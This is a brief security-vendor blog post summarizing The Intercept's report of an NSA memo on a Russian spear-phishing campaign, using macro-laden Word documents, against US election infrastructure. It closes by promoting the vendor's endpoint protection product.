The Intercept recently released a top secret internal memo detailing a sophisticated state-sponsored attack campaign aimed at obtaining information on election-related software and hardware.

According to the Intercept: “The top-secret National Security Agency document, which was provided anonymously to The Intercept and independently authenticated, analyzes intelligence very recently acquired by the agency about a months-long Russian intelligence cyber effort against elements of the U.S. election and voting infrastructure. The report, dated May 5, 2017, is the most detailed U.S. government account of Russian interference in the election that has yet come to light.”

About the Attack

These attacks utilized spear-phishing emails primarily themed as voter registration, spoofed election-related products and services, and researching absentee ballot disguises. Initial access to internal networks was accomplished when an unsuspecting user at the targeted company opened up the attached Word document. An embedded macro in the Word doc spawns PowerShell and uses it to download and execute a payload from a U.S.-hosted IP addresses.

Carbon Black’s Cb Defense will block weaponized Office documents out of the box with complete visibility into this entire attack kill chain. The EDR features within Cb Defense allows you to quickly assess the proliferation of a spear phishing campaign with complete visibility/prevention to all stages in this attack.